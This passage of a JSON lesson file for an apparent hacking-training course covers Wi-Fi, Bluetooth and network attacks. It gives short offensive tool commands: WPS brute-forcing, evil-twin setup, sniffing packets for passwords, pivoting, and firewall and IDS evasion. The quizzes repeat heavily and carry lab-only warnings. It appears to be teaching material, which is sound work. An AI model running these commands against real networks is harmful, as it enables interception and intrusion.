layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"wps-pin","cat":"Network Attacks","title":"WPS Pin Attack","diff":1,"xp":100,"intro":"Brute-force WPS.","sections":[{"type":"text","content":"Brute-force WPS."},{"type":"code","lang":"bash","content":"wash -i wlan0mon\nreaver -i wlan0mon -b AP_BSSID -vv"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPS pin possibilities?","opts":["100","11,000","1,000,000","Infinite"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"evil-twin","cat":"Network Attacks","title":"Evil Twin AP","diff":2,"xp":150,"intro":"Fake AP for interception.","sections":[{"type":"text","content":"Fake AP for interception."},{"type":"code","lang":"bash","content":"hostapd-mana evil.conf\ndnsmasq --interface=wlan0 --dhcp-range=10.0.0.10,10.0.0.100"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Evil twin convincing factor?","opts":["Signal","Same SSID + stronger signal","Channel","WPA3"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"bt-hack","cat":"Network Attacks","title":"Bluetooth Hacking","diff":2,"xp":150,"intro":"Exploit Bluetooth.","sections":[{"type":"text","content":"Exploit Bluetooth."},{"type":"code","lang":"bash","content":"hcitool scan\nsdptool browse AA:BB:CC:DD:EE:FF"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Unsolicited file send?","opts":["Bluebugging","Bluejacking","Bluesnarfing","BlueSmack"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pkt-sniff","cat":"Network Attacks","title":"Packet Sniffing","diff":1,"xp":75,"intro":"Capture network packets.","sections":[{"type":"text","content":"Capture network packets."},{"type":"code","lang":"bash","content":"sudo tcpdump -i eth0 -w capture.pcap\nsudo tcpdump -A port 80 | grep -i pass"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Packet analysis GUI?","opts":["tcpdump","Wireshark","netcat","nmap"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pivot","cat":"Network Attacks","title":"Network Pivoting","diff":2,"xp":175,"intro":"Reach internal networks.","sections":[{"type":"text","content":"Reach internal networks."},{"type":"code","lang":"bash","content":"ssh -D 1080 user@pivot\nproxychains nmap internal\nchisel client pivot:8000 R:socks"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Purpose of pivoting?","opts":["Speed","Reach internal networks via compromised host","Privesc","Exfil"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ssh-tun","cat":"Network Attacks","title":"SSH Tunneling","diff":1,"xp":100,"intro":"Forward ports via SSH.","sections":[{"type":"text","content":"Forward ports via SSH."},{"type":"code","lang":"bash","content":"ssh -L 3306:localhost:3306 user@remote\nssh -R 9090:localhost:8080 user@remote\nssh -D 1080 user@remote"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Local forward flag?","opts":["-R","-L","-D","-N"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"port-fwd","cat":"Network Attacks","title":"Port Forwarding","diff":2,"xp":125,"intro":"Redirect traffic.","sections":[{"type":"text","content":"Redirect traffic."},{"type":"code","lang":"bash","content":"socat TCP-LISTEN:8080,fork TCP:internal:80"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Versatile relay tool?","opts":["netcat","socat","ncat","curl"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"fw-evasion","cat":"Network Attacks","title":"Firewall Evasion","diff":2,"xp":150,"intro":"Bypass firewalls.","sections":[{"type":"text","content":"Bypass firewalls."},{"type":"code","lang":"bash","content":"nmap -f 10.10.10.1\nnmap --source-port 53 10.10.10.1"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Why port 53 bypasses?","opts":["HTTP","DNS traffic usually allowed","Encrypted","ICMP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ids-evade","cat":"Network Attacks","title":"IDS/IPS Bypass","diff":3,"xp":200,"intro":"Evade intrusion detection.","sections":[{"type":"text","content":"Evade intrusion detection."},{"type":"code","lang":"bash","content":"nmap -f --mtu 8 10.10.10.1\nnmap -T1 10.10.10.1"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Timing evasion?","opts":["Fragmentation","Slow scan below 